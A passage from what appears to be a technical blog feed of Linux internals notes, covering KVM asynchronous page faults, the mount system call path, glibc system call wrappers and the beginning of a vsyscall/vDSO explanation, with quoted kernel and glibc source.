+ kvm_make_request(KVM_REQ_APF_HALT, vcpu);
+ return true;
+ } else if (kvm_arch_setup_async_pf(vcpu, gva, gfn))
+ return true;
+ }
+
+ *pfn = gfn_to_pfn(vcpu->kvm, gfn);
+
+ return false;
+}
+int kvm_setup_async_pf(struct kvm_vcpu *vcpu, gva_t gva, gfn_t gfn,
+ struct kvm_arch_async_pf *arch)
+{
+ struct kvm_async_pf *work;
+
+ if (vcpu->async_pf.queued >= ASYNC_PF_PER_VCPU)
+ return 0;
+
+ /* setup delayed work */
+
+ /*
+ * do alloc nowait since if we are going to sleep anyway we
+ * may as well sleep faulting in page
+ */
+ work = kmem_cache_zalloc(async_pf_cache, GFP_NOWAIT);
+ if (!work)
+ return 0;
+
+ work->page = NULL;
+ work->done = false;
+ work->vcpu = vcpu;
+ work->gva = gva;
+ work->addr = gfn_to_hva(vcpu->kvm, gfn);
+ work->arch = *arch;
+ work->mm = current->mm;
+ atomic_inc(&work->mm->mm_count);
+ kvm_get_kvm(work->vcpu->kvm);
+
+ /* this can't really happen otherwise gfn_to_pfn_async
+ would succeed */
+ if (unlikely(kvm_is_error_hva(work->addr)))
+ goto retry_sync;
+
+ INIT_WORK(&work->work, async_pf_execute);
+ if (!schedule_work(&work->work))
+ goto retry_sync;
+
+ list_add_tail(&work->queue, &vcpu->async_pf.queue);
+ vcpu->async_pf.queued++;
+ kvm_arch_async_page_not_present(vcpu, work);
+ return 1;
+retry_sync:
+ kvm_put_kvm(work->vcpu->kvm);
+ mmdrop(work->mm);
+ kmem_cache_free(async_pf_cache, work);
+ return 0;
+}
</code></pre></div></div>
<p>If kvm can do apf, it calls ‘kvm_setup_async_pf’ (via ‘kvm_arch_setup_async_pf’) to set up a work item and calls ‘kvm_arch_async_page_not_present’ to notify the guest. As this commit just sets up the apf framework, ‘kvm_arch_async_page_not_present’ doesn’t inject an interrupt yet.</p>
<p>‘kvm_setup_async_pf’ initializes a ‘work_struct’ and its function is ‘async_pf_execute’. ‘async_pf_execute’ swaps in the fault page.</p>
<p>Then in ‘__vcpu_run’, when the guest VMEXITs, kvm calls ‘kvm_check_async_pf_completion’ to check whether the apf work is done. This is the first version of apf, using a ‘batch mechanism’. Commit <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=e0ead41a6dac09f86675ce07a66e4b253a9b7bd5">KVM: async_pf: Provide additional direct page notification</a> adds a config option ‘KVM_ASYNC_PF_SYNC’; when it is selected, kvm notifies the guest directly.</p>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=7c90705bf2a373aa238661bdb6446f27299ef489">KVM: Inject asynchronous page fault into a PV guest if page is swapped out</a> is easy to understand.</p>
<p>The following is the core: when the page is not present, kvm can either halt the vcpu or inject ‘KVM_PV_REASON_PAGE_NOT_PRESENT’ into the guest. When the async page is ready, kvm injects ‘KVM_PV_REASON_PAGE_READY’ into the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void kvm_arch_async_page_not_present(struct kvm_vcpu *vcpu,
struct kvm_async_pf *work)
{
- trace_kvm_async_pf_not_present(work->gva);
-
- kvm_make_request(KVM_REQ_APF_HALT, vcpu);
+ trace_kvm_async_pf_not_present(work->arch.token, work->gva);
kvm_add_async_pf_gfn(vcpu, work->arch.gfn);
+
+ if (!(vcpu->arch.apf.msr_val & KVM_ASYNC_PF_ENABLED) ||
+ kvm_x86_ops->get_cpl(vcpu) == 0)
+ kvm_make_request(KVM_REQ_APF_HALT, vcpu);
+ else if (!apf_put_user(vcpu, KVM_PV_REASON_PAGE_NOT_PRESENT)) {
+ vcpu->arch.fault.error_code = 0;
+ vcpu->arch.fault.address = work->arch.token;
+ kvm_inject_page_fault(vcpu);
+ }
}
void kvm_arch_async_page_present(struct kvm_vcpu *vcpu,
struct kvm_async_pf *work)
{
- trace_kvm_async_pf_ready(work->gva);
- kvm_del_async_pf_gfn(vcpu, work->arch.gfn);
+ trace_kvm_async_pf_ready(work->arch.token, work->gva);
+ if (is_error_page(work->page))
+ work->arch.token = ~0; /* broadcast wakeup */
+ else
+ kvm_del_async_pf_gfn(vcpu, work->arch.gfn);
+
+ if ((vcpu->arch.apf.msr_val & KVM_ASYNC_PF_ENABLED) &&
+ !apf_put_user(vcpu, KVM_PV_REASON_PAGE_READY)) {
+ vcpu->arch.fault.error_code = 0;
+ vcpu->arch.fault.address = work->arch.token;
+ kvm_inject_page_fault(vcpu);
+ }
+}
</code></pre></div></div>
<h3> Reference </h3>
<p>[1] <a href="https://www.linux-kvm.org/images/a/ac/2010-forum-Async-page-faults.pdf">Asynchronous page faults</a></p>
<p>[2] <a href="https://www.kernelnote.com/entry/kvmguestswap">从kvm场景下guest访问的内存被swap出去之后说起</a></p>
system call analysis: mount2019-02-23T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/23/linux-system-call-mount
<p>The data on disk is just raw bytes, but users need to access this data as files, so there should be a layer to abstract this. This is what a file system does.</p>
<p>Linux supports a lot of file systems. There are several kinds: for example, ext2/3/4 and xfs are for local storage, proc and sys are pseudo file systems, and nfs is a network file system.</p>
<p>Whenever we want to use new storage, we first need to make a file system on it and then mount it in the OS. After that, users can access the data on the new storage.</p>
<p>This post is a note on the mount system call.
Following is the definition of the mount system call:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <sys/mount.h>
int mount(const char *source, const char *target,
const char *filesystemtype, unsigned long mountflags,
const void *data);
</code></pre></div></div>
<p>The first argument ‘source’ often specifies a storage device’s pathname.
The second argument ‘target’ specifies the location where ‘source’ will be attached.
‘filesystemtype’ specifies the file system name, such as ‘ext4’, ‘xfs’, ‘iso9660’ and so on.
The final argument ‘data’ is interpreted by the individual file systems.</p>
<p>mount syscall is defined in fs/namespace.c.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE5(mount, char __user *, dev_name, char __user *, dir_name,
char __user *, type, unsigned long, flags, void __user *, data)
{
int ret;
char *kernel_type;
char *kernel_dev;
unsigned long data_page;
kernel_type = copy_mount_string(type);
ret = PTR_ERR(kernel_type);
if (IS_ERR(kernel_type))
goto out_type;
kernel_dev = copy_mount_string(dev_name);
ret = PTR_ERR(kernel_dev);
if (IS_ERR(kernel_dev))
goto out_dev;
ret = copy_mount_options(data, &data_page);
if (ret < 0)
goto out_data;
ret = do_mount(kernel_dev, dir_name, kernel_type, flags,
(void *) data_page);
free_page(data_page);
out_data:
kfree(kernel_dev);
out_dev:
kfree(kernel_type);
out_type:
return ret;
}
</code></pre></div></div>
<p>It copies the userspace arguments into the kernel and then transfers control to ‘do_mount’.</p>
<p>‘do_mount’ first gets the ‘path’ struct of the userspace-specified directory path. struct ‘path’ contains a ‘vfsmount’ and a ‘dentry’ and is used to represent a directory path’s dentry.
Then ‘do_mount’ dispatches according to the ‘flags’ value to the corresponding function, such as ‘do_remount’, ‘do_loopback’, ‘do_change_type’ and so on. The default is ‘do_new_mount’, which adds a new mount to a directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int do_new_mount(struct path *path, const char *fstype, int flags,
int mnt_flags, const char *name, void *data)
{
struct file_system_type *type;
struct user_namespace *user_ns = current->nsproxy->mnt_ns->user_ns;
struct vfsmount *mnt;
int err;
if (!fstype)
return -EINVAL;
type = get_fs_type(fstype);
if (!type)
return -ENODEV;
if (user_ns != &init_user_ns) {
if (!(type->fs_flags & FS_USERNS_MOUNT)) {
put_filesystem(type);
return -EPERM;
}
/* Only in special cases allow devices from mounts
* created outside the initial user namespace.
*/
if (!(type->fs_flags & FS_USERNS_DEV_MOUNT)) {
flags |= MS_NODEV;
mnt_flags |= MNT_NODEV | MNT_LOCK_NODEV;
}
if (type->fs_flags & FS_USERNS_VISIBLE) {
if (!fs_fully_visible(type, &mnt_flags)) {
put_filesystem(type);
return -EPERM;
}
}
}
mnt = vfs_kern_mount(type, flags, name, data);
if (!IS_ERR(mnt) && (type->fs_flags & FS_HAS_SUBTYPE) &&
!mnt->mnt_sb->s_subtype)
mnt = fs_set_subtype(mnt, fstype);
put_filesystem(type);
if (IS_ERR(mnt))
return PTR_ERR(mnt);
err = do_add_mount(real_mount(mnt), path, mnt_flags);
if (err)
mntput(mnt);
return err;
}
</code></pre></div></div>
<p>The main functions called by ‘do_new_mount’ are ‘vfs_kern_mount’ and ‘do_add_mount’.
‘vfs_kern_mount’ creates and initializes a new ‘mount’ to represent this new mount.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfsmount *
vfs_kern_mount(struct file_system_type *type, int flags, const char *name, void *data)
{
struct mount *mnt;
struct dentry *root;
if (!type)
return ERR_PTR(-ENODEV);
mnt = alloc_vfsmnt(name);
if (!mnt)
return ERR_PTR(-ENOMEM);
if (flags & MS_KERNMOUNT)
mnt->mnt.mnt_flags = MNT_INTERNAL;
root = mount_fs(type, flags, name, data);
if (IS_ERR(root)) {
mnt_free_id(mnt);
free_vfsmnt(mnt);
return ERR_CAST(root);
}
mnt->mnt.mnt_root = root;
mnt->mnt.mnt_sb = root->d_sb;
mnt->mnt_mountpoint = mnt->mnt.mnt_root;
mnt->mnt_parent = mnt;
lock_mount_hash();
list_add_tail(&mnt->mnt_instance, &root->d_sb->s_mounts);
unlock_mount_hash();
return &mnt->mnt;
}
</code></pre></div></div>
<p>It then calls ‘mount_fs’, which calls the ‘mount’ callback registered by the file system type. The ‘mount’ callback reads the device’s super_block and returns the root ‘dentry’ of that ‘super_block’. Then ‘vfs_kern_mount’ initializes the struct ‘mount’.</p>
<p>After ‘vfs_kern_mount’ finishes, ‘do_new_mount’ calls ‘do_add_mount’; this function adds the new mount to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int do_add_mount(struct mount *newmnt, struct path *path, int mnt_flags)
{
struct mountpoint *mp;
struct mount *parent;
int err;
mnt_flags &= ~MNT_INTERNAL_FLAGS;
mp = lock_mount(path);
if (IS_ERR(mp))
return PTR_ERR(mp);
parent = real_mount(path->mnt);
err = -EINVAL;
if (unlikely(!check_mnt(parent))) {
/* that's acceptable only for automounts done in private ns */
if (!(mnt_flags & MNT_SHRINKABLE))
goto unlock;
/* ... and for those we'd better have mountpoint still alive */
if (!parent->mnt_ns)
goto unlock;
}
/* Refuse the same filesystem on the same mount point */
err = -EBUSY;
if (path->mnt->mnt_sb == newmnt->mnt.mnt_sb &&
path->mnt->mnt_root == path->dentry)
goto unlock;
err = -EINVAL;
if (d_is_symlink(newmnt->mnt.mnt_root))
goto unlock;
newmnt->mnt.mnt_flags = mnt_flags;
err = graft_tree(newmnt, parent, mp);
unlock:
unlock_mount(mp);
return err;
}
</code></pre></div></div>
<p>Notice that here ‘newmnt’ is the newly created mount representing the new device,
and ‘path’ is the directory the device will be attached to. This function does some checks (for example, the same file system can’t be attached to the same directory twice) and then calls ‘graft_tree’. ‘graft_tree’ calls ‘attach_recursive_mnt’ to add this new mount to the system.</p>
<p>The most important step is setting up the relation between the new vfsmount and the parent vfsmount.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mnt_set_mountpoint(dest_mnt, dest_mp, source_mnt);
commit_tree(source_mnt);
</code></pre></div></div>
glibc system call wrapper2019-02-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/17/glibc-syscall-wrapper
<h3> Introduction </h3>
<p>glibc uses two methods to wrap system calls: one uses the make-syscalls.sh script to generate the wrapper, the other implements the wrapper in a C file with the help of some macros.</p>
<p>After we configure and build the glibc source code, we can find a ‘sysd-syscalls’ file in the ‘~/glibc-2.27/build’ directory. In this file, a system call whose wrapper is generated by the script looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #### CALL=dup NUMBER=32 ARGS=i:i SOURCE=-
ifeq (,$(filter dup,$(unix-syscalls)))
unix-syscalls += dup
$(foreach p,$(sysd-rules-targets),$(foreach o,$(object-suffixes),$(objpfx)$(patsubst %,$p,dup)$o)): \
$(..)sysdeps/unix/make-syscalls.sh
$(make-target-directory)
(echo '#define SYSCALL_NAME dup'; \
echo '#define SYSCALL_NARGS 1'; \
echo '#define SYSCALL_SYMBOL __dup'; \
echo '#define SYSCALL_NOERRNO 0'; \
echo '#define SYSCALL_ERRVAL 0'; \
echo '#include <syscall-template.S>'; \
echo 'weak_alias (__dup, dup)'; \
echo 'hidden_weak (dup)'; \
) | $(compile-syscall) $(foreach p,$(patsubst %dup,%,$(basename $(@F))),$($(p)CPPFLAGS))
endif
</code></pre></div></div>
<p>If one system call’s wrapper is implemented in a C file, it looks like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #### CALL=open NUMBER=2 ARGS=Ci:siv SOURCE=sysdeps/unix/sysv/linux/open.c
#### CALL=profil NUMBER=- ARGS=i:piii SOURCE=sysdeps/unix/sysv/linux/profil.c
#### CALL=ptrace NUMBER=101 ARGS=i:iiii SOURCE=sysdeps/unix/sysv/linux/ptrace.c
#### CALL=read NUMBER=0 ARGS=Ci:ibn SOURCE=sysdeps/unix/sysv/linux/read.c
</code></pre></div></div>
<h3> Script wrapper </h3>
<p>Three kinds of files are involved in the script wrapper:
one ‘make-syscalls.sh’ file, one ‘syscall-template.S’ file, and several ‘syscalls.list’ files.</p>
<p>‘glibc-2.27/sysdeps/unix/make-syscalls.sh’ is a script that reads the ‘syscalls.list’ files and parses every line to generate a wrapper for each system call.</p>
<p>The ‘syscalls.list’ has following shape:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # File name Caller Syscall name Args Strong name Weak names
accept - accept Ci:iBN __libc_accept accept
access - access i:si __access access
acct - acct i:S acct
adjtime - adjtime i:pp __adjtime adjtime
bind - bind i:ipi __bind bind
chdir - chdir i:s __chdir chdir
chmod - chmod i:si __chmod chmod
</code></pre></div></div>
<p>This file specifies each system call’s name, arguments, and so on.</p>
<p>There are several syscalls.list files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> sysdeps/unix/syscalls.list
sysdeps/unix/sysv/linux/syscalls.list
sysdeps/unix/sysv/linux/generic/syscalls.list
sysdeps/unix/sysv/linux/x86_64/syscalls.list
</code></pre></div></div>
<p>‘syscall-template.S’ is a template file used by every script-generated system call wrapper.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <sysdep.h>
/* This indirection is needed so that SYMBOL gets macro-expanded. */
#define syscall_hidden_def(SYMBOL) hidden_def (SYMBOL)
#define T_PSEUDO(SYMBOL, NAME, N) PSEUDO (SYMBOL, NAME, N)
#define T_PSEUDO_NOERRNO(SYMBOL, NAME, N) PSEUDO_NOERRNO (SYMBOL, NAME, N)
#define T_PSEUDO_ERRVAL(SYMBOL, NAME, N) PSEUDO_ERRVAL (SYMBOL, NAME, N)
#define T_PSEUDO_END(SYMBOL) PSEUDO_END (SYMBOL)
#define T_PSEUDO_END_NOERRNO(SYMBOL) PSEUDO_END_NOERRNO (SYMBOL)
#define T_PSEUDO_END_ERRVAL(SYMBOL) PSEUDO_END_ERRVAL (SYMBOL)
#if SYSCALL_NOERRNO
/* This kind of system call stub never returns an error.
We return the return value register to the caller unexamined. */
T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
ret_NOERRNO
T_PSEUDO_END_NOERRNO (SYSCALL_SYMBOL)
#elif SYSCALL_ERRVAL
/* This kind of system call stub returns the errno code as its return
value, or zero for success. We may massage the kernel's return value
to meet that ABI, but we never set errno here. */
T_PSEUDO_ERRVAL (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
ret_ERRVAL
T_PSEUDO_END_ERRVAL (SYSCALL_SYMBOL)
#else
/* This is a "normal" system call stub: if there is an error,
it returns -1 and sets errno. */
T_PSEUDO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
ret
T_PSEUDO_END (SYSCALL_SYMBOL)
#endif
syscall_hidden_def (SYSCALL_SYMBOL)
</code></pre></div></div>
<p>There are three kinds of system call wrappers, defined by ‘T_PSEUDO’, ‘T_PSEUDO_NOERRNO’ and ‘T_PSEUDO_ERRVAL’. If ‘SYSCALL_NOERRNO’ is defined, the system call is wrapped by ‘T_PSEUDO_NOERRNO’, meaning the wrapper doesn’t return an error code, for example the ‘getpid’ and ‘umask’ system calls. If ‘SYSCALL_ERRVAL’ is defined, the system call is wrapped by ‘T_PSEUDO_ERRVAL’, meaning the wrapper returns the kernel error code directly. If neither ‘SYSCALL_NOERRNO’ nor ‘SYSCALL_ERRVAL’ is defined, the system call is wrapped by ‘T_PSEUDO’, meaning the wrapper returns -1 on error and copies the return value (the error) into the errno variable.</p>
<p>‘T_PSEUDO’, ‘T_PSEUDO_NOERRNO’ and ‘T_PSEUDO_ERRVAL’ are defined in ‘sysdep.h’, which is ‘glibc-2.27/sysdeps/unix/sysv/linux/x86_64/sysdep.h’.</p>
<p>First, let’s look at ‘PSEUDO_NOERRNO’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef PSEUDO_NOERRNO
# define PSEUDO_NOERRNO(name, syscall_name, args) \
.text; \
ENTRY (name) \
DO_CALL (syscall_name, args)
# undef PSEUDO_END_NOERRNO
# define PSEUDO_END_NOERRNO(name) \
END (name)
</code></pre></div></div>
<p>Following is definition of ‘DO_CALL’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef DO_CALL
# define DO_CALL(syscall_name, args) \
DOARGS_##args \
movl $SYS_ify (syscall_name), %eax; \
syscall;
</code></pre></div></div>
<p>‘DOARGS_##args’ expands to the code that sets up the system call arguments. The kernel expects parameters in the following registers:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> syscall number rax
arg 1 rdi
arg 2 rsi
arg 3 rdx
arg 4 r10
arg 5 r8
arg 6 r9
</code></pre></div></div>
<p>However, a normal userspace function call, including a call to a system call stub, passes parameters as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> system call number in the DO_CALL macro
arg 1 rdi
arg 2 rsi
arg 3 rdx
arg 4 rcx
arg 5 r8
arg 6 r9
</code></pre></div></div>
<p>So DOARGS_x has the following definitions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # define DOARGS_0 /* nothing */
# define DOARGS_1 /* nothing */
# define DOARGS_2 /* nothing */
# define DOARGS_3 /* nothing */
# define DOARGS_4 movq %rcx, %r10;
# define DOARGS_5 DOARGS_4
# define DOARGS_6 DOARGS_5
</code></pre></div></div>
<p>This means only when the system call has four or more arguments does it need to move the %rcx argument into %r10.</p>
<p>‘SYS_ify’ is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef SYS_ify
#define SYS_ify(syscall_name) __NR_##syscall_name
</code></pre></div></div>
<p>So the ‘DO_CALL’ macro sets up the system call’s arguments, moves the system call number into %eax and executes the ‘syscall’ instruction.</p>
<p>The ‘ENTRY’ and ‘END’ macros used by ‘PSEUDO_NOERRNO’ are the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> /* Define an entry point visible from C. */
#define ENTRY(name) \
.globl C_SYMBOL_NAME(name); \
.type C_SYMBOL_NAME(name),@function; \
.align ALIGNARG(4); \
C_LABEL(name) \
cfi_startproc; \
CALL_MCOUNT
#undef END
#define END(name) \
cfi_endproc; \
ASM_SIZE_DIRECTIVE(name)
</code></pre></div></div>
<p>Nothing special, just some standard definitions.</p>
<p>So for ‘PSEUDO_NOERRNO’, the system call never returns an error, and glibc doesn’t need to do anything with the return value.</p>
<p>For ‘PSEUDO_ERRVAL’, the wrapper just returns the negated error number.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef PSEUDO_ERRVAL
# define PSEUDO_ERRVAL(name, syscall_name, args) \
.text; \
ENTRY (name) \
DO_CALL (syscall_name, args); \
negq %rax
# undef PSEUDO_END_ERRVAL
# define PSEUDO_END_ERRVAL(name) \
END (name)
</code></pre></div></div>
<p>For ‘PSEUDO’, the wrapper compares the return value with -4095: if the return value is &gt;= -4095 (0xfffffffffffff001), the system call in the kernel returned an error, and glibc jumps to ‘SYSCALL_ERROR_LABEL’ to handle it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef PSEUDO
# define PSEUDO(name, syscall_name, args) \
.text; \
ENTRY (name) \
DO_CALL (syscall_name, args); \
cmpq $-4095, %rax; \
jae SYSCALL_ERROR_LABEL
# undef PSEUDO_END
# define PSEUDO_END(name) \
SYSCALL_ERROR_HANDLER \
END (name)
</code></pre></div></div>
<p>‘SYSCALL_ERROR_LABEL’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # ifdef PIC
# define SYSCALL_ERROR_LABEL 0f
# else
# define SYSCALL_ERROR_LABEL syscall_error
# endif
</code></pre></div></div>
<p>For no PIC defined:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define syscall_error __syscall_error
int
__attribute__ ((__regparm__ (1)))
__syscall_error (int error)
{
__set_errno (-error);
return -1;
}
</code></pre></div></div>
<p>So for ‘PSEUDO’, glibc sets errno from the kernel-returned error and returns -1 from the wrapper function.</p>
<p>Following is the disassembly of the dup system call wrapper as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 00000000000e4ea0 <dup>:
e4ea0: b8 20 00 00 00 mov $0x20,%eax
e4ea5: 0f 05 syscall
e4ea7: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax
e4ead: 73 01 jae e4eb0 <dup+0x10>
e4eaf: c3 retq
e4eb0: 48 8b 0d b1 8f 2c 00 mov 0x2c8fb1(%rip),%rcx # 3ade68 <.got+0x108>
e4eb7: f7 d8 neg %eax
e4eb9: 64 89 01 mov %eax,%fs:(%rcx)
e4ebc: 48 83 c8 ff or $0xffffffffffffffff,%rax
e4ec0: c3 retq
e4ec1: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
e4ec8: 00 00 00
e4ecb: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)
</code></pre></div></div>
<h3> C file wrapper </h3>
<p>As mentioned above, there is a second kind of wrapper, implemented in a C file. For example, ‘sysd-syscalls’ has the following line:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #### CALL=read NUMBER=0 ARGS=Ci:ibn SOURCE=sysdeps/unix/sysv/linux/read.c
</code></pre></div></div>
<p>Both ‘__libc_read’ and ‘__read_nocancel’ will call:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> INLINE_SYSCALL_CALL (read, fd, buf, nbytes);
#define INLINE_SYSCALL_CALL(...) \
__INLINE_SYSCALL_DISP (__INLINE_SYSCALL, __VA_ARGS__)
</code></pre></div></div>
<p>So ‘INLINE_SYSCALL_CALL’ expands to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __INLINE_SYSCALL_DISP (__INLINE_SYSCALL, read, fd, buf, nbytes)
#define __INLINE_SYSCALL_DISP(b,...) \
__SYSCALL_CONCAT (b,__INLINE_SYSCALL_NARGS(__VA_ARGS__))(__VA_ARGS__)
</code></pre></div></div>
<p>The macro __INLINE_SYSCALL_NARGS(read, fd, buf, nbytes) expands to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __INLINE_SYSCALL_NARGS_X (read, fd, buf, nbytes,7,6,5,4,3,2,1,0,)
</code></pre></div></div>
<p>This finally evaluates to 3.</p>
<p>So ‘__INLINE_SYSCALL_DISP (__INLINE_SYSCALL, read, fd, buf, nbytes)’ is expanded to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __INLINE_SYSCALL3(read, fd, buf, nbytes)
</code></pre></div></div>
<p>As:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define __INLINE_SYSCALL3(name, a1, a2, a3) \
INLINE_SYSCALL (name, 3, a1, a2, a3)
</code></pre></div></div>
<p>extended to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> INLINE_SYSCALL(read, 3, fd, buf, nbytes)
</code></pre></div></div>
<p>This MACRO is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # undef INLINE_SYSCALL
# define INLINE_SYSCALL(name, nr, args...) \
({ \
unsigned long int resultvar = INTERNAL_SYSCALL (name, , nr, args); \
if (__glibc_unlikely (INTERNAL_SYSCALL_ERROR_P (resultvar, ))) \
{ \
__set_errno (INTERNAL_SYSCALL_ERRNO (resultvar, )); \
resultvar = (unsigned long int) -1; \
} \
(long int) resultvar; })
</code></pre></div></div>
<p>Now look at the ‘INTERNAL_SYSCALL’ macro:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef INTERNAL_SYSCALL
#define INTERNAL_SYSCALL(name, err, nr, args...) \
internal_syscall##nr (SYS_ify (name), err, args)
</code></pre></div></div>
<p>For ‘internal_syscall3’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef internal_syscall3
#define internal_syscall3(number, err, arg1, arg2, arg3) \
({ \
unsigned long int resultvar; \
TYPEFY (arg3, __arg3) = ARGIFY (arg3); \
TYPEFY (arg2, __arg2) = ARGIFY (arg2); \
TYPEFY (arg1, __arg1) = ARGIFY (arg1); \
register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \
register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \
register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \
asm volatile ( \
"syscall\n\t" \
: "=a" (resultvar) \
: "0" (number), "r" (_a1), "r" (_a2), "r" (_a3) \
: "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \
(long int) resultvar; \
})
</code></pre></div></div>
<p>So this macro finally loads the three arguments into the proper registers, executes the syscall instruction, and returns ‘resultvar’.</p>
<p>Going back to the ‘INLINE_SYSCALL’ macro:</p>
<p>if ‘resultvar’ indicates an error, glibc assigns -resultvar to errno and returns -1 as the wrapper’s return value.</p>
vsyscall and vDSO2019-02-13T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/13/vsyscall-and-vdso
<h3> Introduction </h3>
<p>Though there is already a very good article introducing <a href="https://0xax.gitbooks.io/linux-insides/content/SysCall/linux-syscall-3.html">vsyscalls and vDSO</a>, I am writing this to strengthen my understanding.</p>
<p>An application in user space makes system calls into the kernel to do privileged work. A system call is an expensive operation involving a trap into the kernel and a return. If an application makes system calls very often, there will be a noticeable performance impact. vsyscall and vDSO are designed to speed up certain simple system calls.</p>
<h3> vsyscalls </h3>
<p>The virtual system call (vsyscall) is the first mechanism in the Linux kernel that tries to accelerate the execution of certain system calls. The idea behind vsyscall is simple: some system calls just return data to user space. If the kernel maps these system calls’ implementation and the related data into user space pages, the application can call them like trivial function calls, with no context switch between user space and kernel space. We can find the vsyscall pages in the kernel <a href="https://github.com/torvalds/linux/blob/16f73eb02d7e1765ccab3d2018e0bd98eb93d973/Documentation/x86/x86_64/mm.txt">documentation</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ffffffffff600000 - ffffffffffdfffff (=8 MB) vsyscalls
</code></pre></div></div>
<p>We can see this in process:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ cat /proc/self/maps | grep vsyscall
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
test@ubuntu:~$
</code></pre></div></div>
<p>As we can see, this address is fixed in every process. The fixed address is considered to violate ASLR, since it allows an attacker to write exploits more easily, so the original vsyscall was discarded. But some very old programs still need the vsyscall page. To keep them working, the kernel doesn’t get rid of the vsyscall page; instead it implements a mechanism called the emulated vsyscall. We will talk about this vsyscall below.</p>
<p>Mapping the vsyscall page occurs during Linux kernel initialization. In the call chain start_kernel-&gt;setup_arch-&gt;map_vsyscall, the last call sets up the vsyscall page. The code of map_vsyscall is shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init map_vsyscall(void)
{
extern char __vsyscall_page;
unsigned long physaddr_vsyscall = __pa_symbol(&__vsyscall_page);
if (vsyscall_mode != NATIVE)
vsyscall_pgprot = __PAGE_KERNEL_VVAR;
if (vsyscall_mode != NONE)
__set_fixmap(VSYSCALL_PAGE, physaddr_vsyscall,
__pgprot(vsyscall_pgprot));
BUILD_BUG_ON((unsigned long)__fix_to_virt(VSYSCALL_PAGE) !=
(unsigned long)VSYSCALL_ADDR);
}
</code></pre></div></div>
<p>First it gets the physical address of the vsyscall page, ‘__vsyscall_page’; the contents of this page are shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __vsyscall_page:
mov $__NR_gettimeofday, %rax
syscall
ret
.balign 1024, 0xcc
mov $__NR_time, %rax
syscall
ret
.balign 1024, 0xcc
mov $__NR_getcpu, %rax
syscall
ret
.balign 4096, 0xcc
.size __vsyscall_page, 4096
</code></pre></div></div>
<p>The vsyscall page contains three system calls: gettimeofday, time and getcpu.</p>
